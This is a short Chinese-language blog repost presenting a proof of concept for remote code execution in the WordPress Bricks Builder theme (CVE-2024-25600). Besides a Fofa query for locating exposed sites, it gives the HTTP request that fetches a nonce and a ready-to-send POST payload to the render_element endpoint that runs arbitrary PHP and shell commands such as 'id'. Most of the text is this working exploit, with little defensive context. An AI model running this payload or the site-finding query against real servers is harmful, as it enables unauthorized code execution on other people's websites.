WordPress Bricks Builder远程代码执行(CVE-2024-25600)附POC工具

admin 2024年3月1日08:57:37评论54 views字数 870阅读2分54秒阅读模式

【WordPress Bricks Builder远程代码执行(CVE-2024-25600)

WordPress Bricks Builder远程代码执行(CVE-2024-25600)附POC工具

资产测绘

WordPress Bricks Builder远程代码执行(CVE-2024-25600)附POC工具
Fofa: body="/wp-content/themes/bricks/" 


WordPress Bricks Builder远程代码执行(CVE-2024-25600)附POC工具

WordPress Bricks Builder远程代码执行(CVE-2024-25600)附POC工具

漏洞利用

WordPress Bricks Builder远程代码执行(CVE-2024-25600)附POC工具

WordPress Bricks Builder远程代码执行(CVE-2024-25600)附POC工具

WordPress Bricks Builder远程代码执行(CVE-2024-25600)附POC工具

WordPress Bricks Builder远程代码执行(CVE-2024-25600)附POC工具

漏洞复现

WordPress Bricks Builder远程代码执行(CVE-2024-25600)附POC工具
GET / HTTP/2Host: bricks.gajdosik.coUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36Connection: closeAccept-Encoding: gzip
首先获取nonce
WordPress Bricks Builder远程代码执行(CVE-2024-25600)附POC工具

使用得到的nonce值构造数据包进行发送

POST /wp-json/bricks/v1/render_element HTTP/2Host: xxxUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36Content-Length: 358Content-Type: application/jsonAccept-Encoding: gzip

{  "postId": "1",  "nonce": "上一步得到的nonce值",  "element": {    "name": "container",    "settings": {      "hasLoop": "true",      "query": {        "useQueryEditor": true,        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",        "objectType": "post"      }    }  }}

如下,成功执行id命令

WordPress Bricks Builder远程代码执行(CVE-2024-25600)附POC工具

原文始发于微信公众号(银遁安全团队):WordPress Bricks Builder远程代码执行(CVE-2024-25600)附POC工具

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月1日08:57:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   WordPress Bricks Builder远程代码执行(CVE-2024-25600)附POC工具http://cn-sec.com/archives/2538402.html

发表评论

匿名网友 填写信息